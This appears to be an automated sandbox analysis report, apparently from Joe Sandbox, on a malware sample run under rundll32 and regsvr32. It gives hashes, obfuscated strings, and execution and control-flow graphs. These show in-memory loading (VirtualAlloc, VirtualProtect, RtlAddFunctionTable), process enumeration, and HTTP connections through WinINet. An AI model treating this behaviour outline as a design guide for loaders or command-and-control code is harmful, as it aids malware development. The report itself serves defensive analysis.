                                                                                                                                      • Instruction ID: 9792ecb135b2155067e966d5e38dbf4f409fde80c29e70d57d2078ebe1ce15c6
                                                                                                                                      • Opcode Fuzzy Hash: db11ef6343568e39e87295be28a4fb69218d9fc865c563580501f4fd78a225ea
                                                                                                                                      • Instruction Fuzzy Hash: 10E1C670109B888FDBF8DF64CC86BEB7BA5FB44346F10651DD84A8A290DBB46645CF41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.264793383.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: B$EG$QsF$_
                                                                                                                                      • API String ID: 0-784369960
                                                                                                                                      • Opcode ID: 2411b4f18f6ae95c167793a9182b69dfaeb4b2ef39c1ac24af76ef798b153418
                                                                                                                                      • Instruction ID: 62dbbc71664ee0946fffbba3b71afe09b12d9ffe0d1744d6deb9db65ff0cd9cc
                                                                                                                                      • Opcode Fuzzy Hash: 2411b4f18f6ae95c167793a9182b69dfaeb4b2ef39c1ac24af76ef798b153418
                                                                                                                                      • Instruction Fuzzy Hash: 3FB1387010468D8FDF88DF28C88A6DA3FA1FB68388F614219FC4A97250C778D694CBC5
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.264793383.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: -`G$.$5B.Y$Z`35
                                                                                                                                      • API String ID: 0-1363032466
                                                                                                                                      • Opcode ID: bf60aa8e83620137796280cd5bd0e9d08ed9dd04dd302297e234b85e3718d0fd
                                                                                                                                      • Instruction ID: b244d414363a4385de25ad5610b22aaac7fb2f2c92cf8150697ad32e565f4bd8
                                                                                                                                      • Opcode Fuzzy Hash: bf60aa8e83620137796280cd5bd0e9d08ed9dd04dd302297e234b85e3718d0fd
                                                                                                                                      • Instruction Fuzzy Hash: 29A1FB716157888FEB7ADF24C89A7CE7BE1FB49308F40461DD98E8A250D7B49609CB42
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.264793383.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: *+_$WSh$\O$#o
                                                                                                                                      • API String ID: 0-1846314129
                                                                                                                                      • Opcode ID: 2b55738af9202b4623c877c52658b874745984570bac3296ae94d1111b904a17
                                                                                                                                      • Instruction ID: 175ce4bc0e22c7a636d32034be2bbb8ad42f6b3cb6a748f64f507b7f0b29ed37
                                                                                                                                      • Opcode Fuzzy Hash: 2b55738af9202b4623c877c52658b874745984570bac3296ae94d1111b904a17
                                                                                                                                      • Instruction Fuzzy Hash: 1971167160474ECFCB98DF18C489ADA3BE1FB58318F414529FC09A7264DB74DAA8CB85
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.264793383.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: .B$O$M*K$\<
                                                                                                                                      • API String ID: 0-3225238681
                                                                                                                                      • Opcode ID: 97d1f14c936b4c6fd28126f9270f10017570076f2259e30e0790da2a5d8d89f7
                                                                                                                                      • Instruction ID: 95d2fbb8f7fe970b1359d27f41ccd6aad584115d4fee043204e0c0f4c3f3b287
                                                                                                                                      • Opcode Fuzzy Hash: 97d1f14c936b4c6fd28126f9270f10017570076f2259e30e0790da2a5d8d89f7
                                                                                                                                      • Instruction Fuzzy Hash: 7181E370549788CFEBBACF24C886BDE7BE4FB48744F20461DE85A8A260DB709645CF41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.264793383.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: $$$$xVO$~O
                                                                                                                                      • API String ID: 0-3655128719
                                                                                                                                      • Opcode ID: f0a1fe130e7a88269555c94ae3afa6992adf671055acde803b367a0cf8dc4998
                                                                                                                                      • Instruction ID: 8f78542db34460f4381821bab2b7e4f68a699ed7f8b2fc47c959991f0b02677a
                                                                                                                                      • Opcode Fuzzy Hash: f0a1fe130e7a88269555c94ae3afa6992adf671055acde803b367a0cf8dc4998
                                                                                                                                      • Instruction Fuzzy Hash: 5B61D1B05187448FD369DF28C18965BBBF1FBC6744F008A1EF6868A260DB76D948CB47
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.264793383.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: ,IW$G$JMg$l
                                                                                                                                      • API String ID: 0-1370644289
                                                                                                                                      • Opcode ID: aa199bcfabd2ca119bc867395ae2bb0b970833e8ef3f83c28db76f19b2a25dac
                                                                                                                                      • Instruction ID: 7fb8b97fd43ed4dc52a467cdcf5cca41e6e56dbc92574a5c866222c6b731b82a
                                                                                                                                      • Opcode Fuzzy Hash: aa199bcfabd2ca119bc867395ae2bb0b970833e8ef3f83c28db76f19b2a25dac
                                                                                                                                      • Instruction Fuzzy Hash: 0A41D3B190074E8FCB48CF64C88A5DE7FB0FB18358F10461EE85AA6250D7B89695CFC9
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.264793383.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: ,$,$2S=$i`}G
                                                                                                                                      • API String ID: 0-4285990414
                                                                                                                                      • Opcode ID: 1704a5678c6fc7c63ed33a4399dbb19a0648d0f8b4dca33206a3e55e43de3fb6
                                                                                                                                      • Instruction ID: 665cb0e6160ce90faac3fa7baf9a16caae401c848b442bb7533a8cc1fd62885f
                                                                                                                                      • Opcode Fuzzy Hash: 1704a5678c6fc7c63ed33a4399dbb19a0648d0f8b4dca33206a3e55e43de3fb6
                                                                                                                                      • Instruction Fuzzy Hash: 4D41E57051CB848FD7B4DF18D486BDABBE0FB98750F40495EE48DC3251DBB0A8858B86
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Execution Graph

                                                                                                                                      Execution Coverage:19.6%
                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                      Signature Coverage:5%
                                                                                                                                      Total number of Nodes:80
                                                                                                                                      Total number of Limit Nodes:9
                                                                                                                                      execution_graph 3902 18001aca4 3907 18001ad22 3902->3907 3903 18001ba75 3907->3903 3908 180012b50 3907->3908 3911 18000a4fc 3907->3911 3914 18001cec4 3907->3914 3910 180012b8a 3908->3910 3909 180012bfb InternetOpenW 3909->3907 3910->3909 3913 18000a572 3911->3913 3912 18000a5f0 HttpOpenRequestW 3912->3907 3913->3912 3916 18001cf4a 3914->3916 3915 18001cfe2 InternetConnectW 3915->3907 3916->3915 3917 750000 3918 750183 3917->3918 3919 75043e VirtualAlloc 3918->3919 3922 750462 3919->3922 3920 750531 GetNativeSystemInfo 3921 75056d VirtualAlloc 3920->3921 3924 750a7b 3920->3924 3923 75058b 3921->3923 3922->3920 3922->3924 3925 750a00 3923->3925 3927 7509d9 VirtualProtect 3923->3927 3925->3924 3926 750a56 RtlAddFunctionTable 3925->3926 3926->3924 3927->3923 3928 180015388 3931 1800227d4 3928->3931 3930 1800153e3 3935 18002281d 3931->3935 3933 180024315 3933->3930 3935->3933 3937 18001c05c 3935->3937 3941 18001c568 3935->3941 3948 180017908 3935->3948 3939 18001c0af 3937->3939 3940 18001c2e1 3939->3940 3952 18002ad58 3939->3952 3940->3935 3944 18001c58a 3941->3944 3943 18001c948 3943->3935 3944->3943 3959 180003598 3944->3959 3963 18000ac48 3944->3963 3967 180025dac 3944->3967 3971 1800097c0 3944->3971 3950 180017932 3948->3950 3949 180015e2c CreateThread 3949->3950 3950->3949 3951 180017bcd 3950->3951 3951->3935 3955 1800046a8 3952->3955 3954 18002ae38 3954->3939 3958 1800046ec 3955->3958 3956 180004982 3956->3954 3957 180004945 Process32FirstW 3957->3958 3958->3956 3958->3957 3961 180003640 3959->3961 3960 1800044c0 3960->3944 3961->3960 3975 18001ed50 3961->3975 3965 18000ac8e 3963->3965 3964 18000b5fe 3964->3944 3965->3964 3966 18001ed50 CreateFileW 3965->3966 3966->3965 3970 180025dde 3967->3970 3969 180026180 3969->3944 3970->3969 3982 180015e2c 3970->3982 3972 1800097fc 3971->3972 3973 18000981d 3972->3973 3974 18001ed50 CreateFileW 3972->3974 3973->3944 3974->3972 3977 18001ed7a 3975->3977 3978 18001f06b 3977->3978 3979 18000fb00 3977->3979 3978->3961 3981 18000fb80 3979->3981 3980 18000fc15 CreateFileW 3980->3977 3981->3980 3983 180015ea5 3982->3983 3984 180015f3b CreateThread 3983->3984 3984->3970 3985 180015e2c 3986 180015ea5 3985->3986 3987 180015f3b CreateThread 3986->3987 3988 18001496c 3989 1800149ce 3988->3989 3990 18000fb00 CreateFileW 3989->3990 3991 1800152ba 3989->3991 3990->3989 3992 180024d80 3994 180024eed 3992->3994 3993 1800250bd 3994->3993 3996 180019a30 3994->3996 3997 180019aa4 3996->3997 3998 180019b2a GetVolumeInformationW 3997->3998 3998->3993

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 0 750000-750460 call 750aa8 * 2 VirtualAlloc 22 750462-750466 0->22 23 75048a-750494 0->23 24 750468-750488 22->24 26 750a91-750aa6 23->26 27 75049a-75049e 23->27 24->23 24->24 27->26 28 7504a4-7504a8 27->28 28->26 29 7504ae-7504b2 28->29 29->26 30 7504b8-7504bf 29->30 30->26 31 7504c5-7504d2 30->31 31->26 32 7504d8-7504e1 31->32 32->26 33 7504e7-7504f4 32->33 33->26 34 7504fa-750507 33->34 35 750531-750567 GetNativeSystemInfo 34->35 36 750509-750511 34->36 35->26 38 75056d-750589 VirtualAlloc 35->38 37 750513-750518 36->37 39 750521 37->39 40 75051a-75051f 37->40 41 7505a0-7505ac 38->41 42 75058b-75059e 38->42 43 750523-75052f 39->43 40->43 44 7505af-7505b2 41->44 42->41 43->35 43->37 46 7505b4-7505bf 44->46 47 7505c1-7505db 44->47 46->44 48 7505dd-7505e2 47->48 49 75061b-750622 47->49 50 7505e4-7505ea 48->50 51 750628-75062f 49->51 52 7506db-7506e2 49->52 53 7505ec-750609 50->53 54 75060b-750619 50->54 51->52 55 750635-750642 51->55 56 750864-75086b 52->56 57 7506e8-7506f9 52->57 53->53 53->54 54->49 54->50 55->52 60 750648-75064f 55->60 58 750917-750929 56->58 59 750871-75087f 56->59 61 750702-750705 57->61 62 750a07-750a1a 58->62 63 75092f-750937 58->63 64 75090e-750911 59->64 65 750654-750658 60->65 66 750707-75070a 61->66 67 7506fb-7506ff 61->67 90 750a40-750a4a 62->90 91 750a1c-750a27 62->91 69 75093b-75093f 63->69 64->58 68 750884-7508a9 64->68 70 7506c0-7506ca 65->70 71 75070c-75071d 66->71 72 750788-75078e 66->72 67->61 95 750907-75090c 68->95 96 7508ab-7508b1 68->96 75 750945-75095a 69->75 76 7509ec-7509fa 69->76 73 7506cc-7506d2 70->73 74 75065a-750669 70->74 77 750794-7507a2 71->77 78 75071f-750720 71->78 72->77 73->65 82 7506d4-7506d5 73->82 86 75066b-750678 74->86 87 75067a-75067e 74->87 84 75095c-75095e 75->84 85 75097b-75097d 75->85 76->69 88 750a00-750a01 76->88 80 75085d-75085e 77->80 81 7507a8 77->81 89 750722-750784 78->89 80->56 92 7507ae-7507d4 81->92 82->52 97 750960-75096c 84->97 98 75096e-750979 84->98 100 7509a2-7509a4 85->100 101 75097f-750981 85->101 99 7506bd-7506be 86->99 102 750680-75068a 87->102 103 75068c-750690 87->103 88->62 89->89 104 750786 89->104 93 750a4c-750a54 90->93 94 750a7b-750a8e 90->94 105 750a38-750a3e 91->105 129 750835-750839 92->129 130 7507d6-7507d9 92->130 93->94 111 750a56-750a79 RtlAddFunctionTable 93->111 94->26 95->64 108 7508b3-7508b9 96->108 109 7508bb-7508c8 96->109 112 7509be-7509bf 97->112 98->112 99->70 106 7509a6-7509aa 100->106 107 7509ac-7509bb 100->107 113 750983-750987 101->113 114 750989-75098b 101->114 115 7506b6-7506ba 102->115 116 7506a5-7506a9 103->116 117 750692-7506a3 103->117 104->77 105->90 110 750a29-750a35 105->110 106->112 107->112 119 7508ea-7508fe 108->119 120 7508d3-7508e5 109->120 121 7508ca-7508d1 109->121 110->105 111->94 118 7509c5-7509cb 112->118 113->112 114->100 124 75098d-75098f 114->124 115->99 116->99 125 7506ab-7506b3 116->125 117->115 126 7509cd-7509d3 118->126 127 7509d9-7509e9 VirtualProtect 118->127 119->95 139 750900-750905 119->139 120->119 121->120 121->121 131 750991-750997 124->131 132 750999-7509a0 124->132 125->115 126->127 127->76 136 750844-750850 129->136 137 75083b 129->137 134 7507e3-7507f0 130->134 135 7507db-7507e1 130->135 131->112 132->118 141 7507f2-7507f9 134->141 142 7507fb-75080d 134->142 140 750812-75082c 135->140 136->92 138 750856-750857 136->138 137->136 138->80 139->96 140->129 144 75082e-750833 140->144 141->141 141->142 142->140 144->130
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.649143385.0000000000750000.00000040.00001000.00020000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_750000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Virtual$Alloc$FunctionInfoNativeProtectSystemTable
                                                                                                                                      • String ID: Cach$Find$Flus$Free$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$Reso$RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce$urce
                                                                                                                                      • API String ID: 394283112-2517549848
                                                                                                                                      • Opcode ID: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                                                                                      • Instruction ID: 14fe3cb0d219657e07582cac0a011a37180b763dd8d4b8f22e053bfb049b0262
                                                                                                                                      • Opcode Fuzzy Hash: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                                                                                      • Instruction Fuzzy Hash: 1E72C530618B488BDB19DF18C8856F9B7E1FB98305F14462DEC8AD7211DB78E946CBC5
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.649306435.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: #X$Ec;$J$^c$^c$n
                                                                                                                                      • API String ID: 0-2929744921
                                                                                                                                      • Opcode ID: 4bf1a5684c4273f47db2f7bfe37ec9194a020a583a1b353a94edbff9173a6149
                                                                                                                                      • Instruction ID: 2841c3f5e183e4376706155e5f630a85a86355917b0bfec54de2fd5c82beda78
                                                                                                                                      • Opcode Fuzzy Hash: 4bf1a5684c4273f47db2f7bfe37ec9194a020a583a1b353a94edbff9173a6149
                                                                                                                                      • Instruction Fuzzy Hash: DB0214705187C88BC798DFA8C48965EFBE1FB98744F108A1DF48687660DBF4D948CB42
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 634 1800132f0-18001332a 635 18001332c-180013331 634->635 636 1800136a3 635->636 637 180013337-18001333c 635->637 638 1800136a8-1800136ad 636->638 639 180013342-180013347 637->639 640 1800135f0-18001368c call 180021434 637->640 638->635 641 1800136b3-1800136b6 638->641 639->638 643 18001334d-1800133c6 call 18001a754 639->643 647 180013691-180013697 640->647 645 180013759-180013760 641->645 646 1800136bc-180013757 call 180013e28 641->646 649 1800133cb-1800133d0 643->649 651 180013763-18001377d 645->651 646->651 647->641 648 180013699-18001369e 647->648 652 1800135e2-1800135eb 648->652 649->646 653 1800133d6-1800133db 649->653 652->635 653->641 655 1800133e1-1800133e6 653->655 655->652 656 1800133ec-1800134a8 call 180021434 655->656 656->641 659 1800134ae-1800135dc call 180016428 call 180013e28 656->659 659->641 659->652
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.649306435.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: =_$F)k$b/$syG
                                                                                                                                      • API String ID: 0-3955183656
                                                                                                                                      • Opcode ID: 78e362ff9fa706a76cdd339057cb87764c88e196f3f9d59d0d5946dc172ac972
                                                                                                                                      • Instruction ID: 3a63fdd7148b145f5d2717dabea2a2fa508061acbcc25a132c341bfe6e9ad30f
                                                                                                                                      • Opcode Fuzzy Hash: 78e362ff9fa706a76cdd339057cb87764c88e196f3f9d59d0d5946dc172ac972
                                                                                                                                      • Instruction Fuzzy Hash: DED12771A0478D8BCF59DFA8C88A6EEBBB0FB48344F10421DE846A7650D7B4D909CF85
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.649306435.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 5IF$P)#
                                                                                                                                      • API String ID: 0-1025399686
                                                                                                                                      • Opcode ID: f542572e4f2ff63548a52b2cdf5e12f4f3f89a6a74df4dd4d6ea84f2146f04ed
                                                                                                                                      • Instruction ID: ff53fea05c8e9f3baddf865253a509f05c382ca6cc85a3c859ee45a04624b947
                                                                                                                                      • Opcode Fuzzy Hash: f542572e4f2ff63548a52b2cdf5e12f4f3f89a6a74df4dd4d6ea84f2146f04ed
                                                                                                                                      • Instruction Fuzzy Hash: 0B9182711197889FCBA9DF18C8857DEB7E0FB88744F90561DF84A8B260C7B4DA49CB42
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 584 18001cec4-18001cf6a call 1800142a0 587 18001cfe2-18001d01f InternetConnectW 584->587 588 18001cf6c-18001cfdc call 18000dd70 584->588 588->587
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.649306435.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ConnectInternet
                                                                                                                                      • String ID: :G?$C
                                                                                                                                      • API String ID: 3050416762-1225920220
                                                                                                                                      • Opcode ID: 76a7b635ccb7068e30ecf2b503a3beb8f1d88f81d4224a3a6f9b87d06452e60c
                                                                                                                                      • Instruction ID: f2a8b8884ccc4c3404819a5ba5e10ed0cdd0f68caef2c301b3e7290f999a0a2a
                                                                                                                                      • Opcode Fuzzy Hash: 76a7b635ccb7068e30ecf2b503a3beb8f1d88f81d4224a3a6f9b87d06452e60c
                                                                                                                                      • Instruction Fuzzy Hash: 5941F67450CB888FD7A8DF18D0857AAB7E0FB98314F508A5EE8CDC7296DB749844CB46
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.649306435.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CreateFile
                                                                                                                                      • String ID: gF\
                                                                                                                                      • API String ID: 823142352-1982329323
                                                                                                                                      • Opcode ID: 7df644aaf73cc9bcde4b6fb7fa72ed7f80eca5e2f74ec0139d961ef78fad827b
                                                                                                                                      • Instruction ID: 218d4d5182cb26b0f36475523bc21bdebfc34a2f4da3002633262ff40041eb9b
                                                                                                                                      • Opcode Fuzzy Hash: 7df644aaf73cc9bcde4b6fb7fa72ed7f80eca5e2f74ec0139d961ef78fad827b
                                                                                                                                      • Instruction Fuzzy Hash: 1931697051C7848BD778DF28D48679ABBE0FB89304F10891EE88DC3352DB709885CB86
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.649306435.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: HttpOpenRequest
                                                                                                                                      • String ID: :G?
                                                                                                                                      • API String ID: 1984915467-1508054202
                                                                                                                                      • Opcode ID: 21630c4fbef06d8aacd4c702dff3e94d0932750c237c7792a79e645746d5d1eb
                                                                                                                                      • Instruction ID: 60d2efcdc3634c8de813e735c521a1a1b2f1d3197bf379f764bafd55f5181dd8
                                                                                                                                      • Opcode Fuzzy Hash: 21630c4fbef06d8aacd4c702dff3e94d0932750c237c7792a79e645746d5d1eb
                                                                                                                                      • Instruction Fuzzy Hash: 83314E7060CB848FDBA8DF18D08679BB7E0FB98315F50455DE88CC7296DB789944CB86
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.649306435.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InternetOpen
                                                                                                                                      • String ID: :G?
                                                                                                                                      • API String ID: 2038078732-1508054202
                                                                                                                                      • Opcode ID: 73d4d0fe1beb5fabfcdff42c943db3c290933a411410652e7bad060f5d798a44
                                                                                                                                      • Instruction ID: c9298170b99e71c9961e7bb575de84f4b40d7dd1197e6373e1c7e5d4160ea6d3
                                                                                                                                      • Opcode Fuzzy Hash: 73d4d0fe1beb5fabfcdff42c943db3c290933a411410652e7bad060f5d798a44
                                                                                                                                      • Instruction Fuzzy Hash: 6F110A71518B888BD3A4DF64D48979BB7E1FB88319F50CA1DF4D9C6250DB788589CB02
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.649306435.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CreateThread
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2422867632-0
                                                                                                                                      • Opcode ID: e7c4e665c3955ccb08a2ed1da7b867fe01ee184c9f438c553d3e32e703deb0b1
                                                                                                                                      • Instruction ID: c545beb4aab352fd45c13a3c06d211153dc7cc573a2023b45670cfe369ebb01f
                                                                                                                                      • Opcode Fuzzy Hash: e7c4e665c3955ccb08a2ed1da7b867fe01ee184c9f438c553d3e32e703deb0b1
                                                                                                                                      • Instruction Fuzzy Hash: 0731F67061CB448FD7A8DF68D48579ABBE0FB88304F508A5EE88CD7356DB349944CB86
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.649306435.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InformationVolume
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2039140958-0
                                                                                                                                      • Opcode ID: 88af29f83271a8505691566097a2d6f523e627b34a42d7322f8369dcba0ae3fb
                                                                                                                                      • Instruction ID: 89e8e56e51c5a60af2ecd67268569f3ffacd31b875f751963744359e30ad4776
                                                                                                                                      • Opcode Fuzzy Hash: 88af29f83271a8505691566097a2d6f523e627b34a42d7322f8369dcba0ae3fb
                                                                                                                                      • Instruction Fuzzy Hash: 2B31407051CB448FD7A8DF18D4C579AB7E0FB88315F60855EE88CC7255CB749948CB86
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%